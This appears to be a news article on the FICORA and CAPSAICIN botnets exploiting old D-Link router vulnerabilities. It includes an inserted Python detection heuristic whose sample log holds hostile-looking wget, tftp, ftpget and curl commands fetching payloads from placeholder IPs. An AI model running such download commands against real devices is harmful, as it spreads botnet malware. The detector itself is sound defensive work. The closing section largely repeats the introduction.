Are Legacy Vulnerabilities in D-Link Routers Fueling New Botnet Attacks?

Recent cyberattacks targeting vulnerable D-Link routers have raised concerns within the cybersecurity community, as documented vulnerabilities originally discovered years ago are being actively exploited once again. The resurgence of these attacks has been attributed to two distinct botnets: a Mirai variant named FICORA and a Kaiten variant known as CAPSAICIN, which leverage these weaknesses to cause significant disruption.

Exploited Vulnerabilities Persist Despite Patches

Cybersecurity researchers have highlighted that these botnets take advantage of long-known vulnerabilities in D-Link routers, some of which date back nearly a decade. Several critical vulnerabilities, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112, are exploited through the Home Network Administration Protocol (HNAP) interface, giving attackers a way in even though patches have been available for years. This enduring issue underscores the ongoing risk posed by legacy devices that have not been properly updated.

Distinct Targets and Attack Methods

The FICORA botnet casts a wide net, targeting countries globally with its sophisticated attack mechanisms. Once a vulnerable router is compromised, FICORA deploys a downloader shell script from a remote server, which retrieves the primary payload suitable for various Linux architectures using commands such as wget, ftpget, curl, and tftp. Furthermore, this botnet incorporates a brute-force attack function that utilizes a hard-coded list of usernames and passwords, enhancing its ability to conduct distributed denial-of-service (DDoS) attacks across UDP, TCP, and DNS protocols.
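A defender-side heuristic for the downloader behaviour described above, as an added example that is not from the original article or the researchers' report: it flags any remote host that two or more of the named tools (wget, ftpget, curl, tftp) are pointed at in a device's command log. The log format, the sample lines and the documentation-range IP addresses are constructed for illustration.

```python
import re
from collections import defaultdict

# Downloader utilities the article names for FICORA's shell script.
DOWNLOADERS = ("wget", "ftpget", "curl", "tftp")
TOOL_RE = re.compile(r"(?:^|[\s/])(" + "|".join(DOWNLOADERS) + r")(?=\s)")
HOST_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Shell separators, so chained commands are inspected one at a time.
SEP_RE = re.compile(r"\|\||&&|[;|&]")

def tools_per_host(lines):
    """Map each remote IPv4 host to the set of download tools aimed at it."""
    seen = defaultdict(set)
    for line in lines:
        for cmd in SEP_RE.split(line):
            tool = TOOL_RE.search(cmd)
            host = HOST_RE.search(cmd)
            if tool and host:
                seen[host.group(0)].add(tool.group(1))
    return dict(seen)

def suspicious_hosts(lines, min_tools=2):
    """Hosts fetched from with several different tools: the fallback
    pattern of a downloader that must work on any firmware build."""
    hits = tools_per_host(lines)
    return sorted(h for h, tools in hits.items() if len(tools) >= min_tools)

# Constructed command-audit lines (hypothetical format, RFC 5737 addresses).
SAMPLE = [
    "pid=412 argv: wget http://192.0.2.10/sample.arm -O /tmp/s",
    "pid=413 argv: tftp -g -r sample.arm 192.0.2.10",
    "pid=414 argv: ftpget 192.0.2.10 sample.arm sample.arm",
    "pid=420 argv: wget http://192.0.2.10/s.mips || curl -O http://192.0.2.10/s.mips",
    "pid=501 argv: wget http://198.51.100.7/firmware-update.bin",
    "pid=502 argv: ping -c 1 203.0.113.5",
]

if __name__ == "__main__":
    for host in suspicious_hosts(SAMPLE):
        print(host, sorted(tools_per_host(SAMPLE)[host]))
```

A single tool fetching from a host (the 198.51.100.7 line) is left alone; the signal is the same host reached through several different tools.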

On the other hand, the CAPSAICIN botnet focuses its efforts on East Asia, especially Japan and Taiwan, with peak activity observed on October 21-22, 2024. This variant employs a different IP address for payload downloads and ensures compatibility with diverse Linux architectures. Notably, CAPSAICIN eliminates other known botnet processes to become the dominant botnet on the affected device. It then connects to its command-and-control server, forwards the victim’s operating system information and assigned nickname, and awaits further instructions.

Commands and Techniques Utilized by CAPSAICIN

CAPSAICIN stands out with its versatility in operations, capable of executing various commands such as obtaining IP addresses, deleting command histories, initiating proxies, changing nicknames, downloading files, and running shell commands. Its DDoS attack capabilities are notable, with specific attacks including HTTP flooding, TCP connection flooding, DNS amplification, and BlackNurse attacks. This breadth of functionality makes CAPSAICIN a formidable threat to affected networks.

The Continued Threat of Legacy Vulnerabilities

Recent cyberattacks targeting vulnerable D-Link routers have triggered alarm bells within the cybersecurity community. These routers are being actively exploited through documented vulnerabilities that were originally discovered years ago. The reemergence of these attacks has been attributed to the activities of two distinct botnets: a Mirai variant known as FICORA and a Kaiten variant called CAPSAICIN. These malicious networks leverage longstanding weaknesses to cause considerable disruption, making it crucial for users to be aware of potential risks.

The Mirai botnet family, infamous for its role in significant past cyberattacks, continues to evolve, with the FICORA variant now exploiting these D-Link router vulnerabilities. Similarly, the Kaiten botnet’s CAPSAICIN variant has been recognized for effectively capitalizing on the same weaknesses. This resurgence emphasizes the importance of regular updates and patches for network devices, as outdated firmware remains a significant security risk. Cybersecurity experts urge users to ensure their devices are running the latest firmware versions to mitigate these threats.
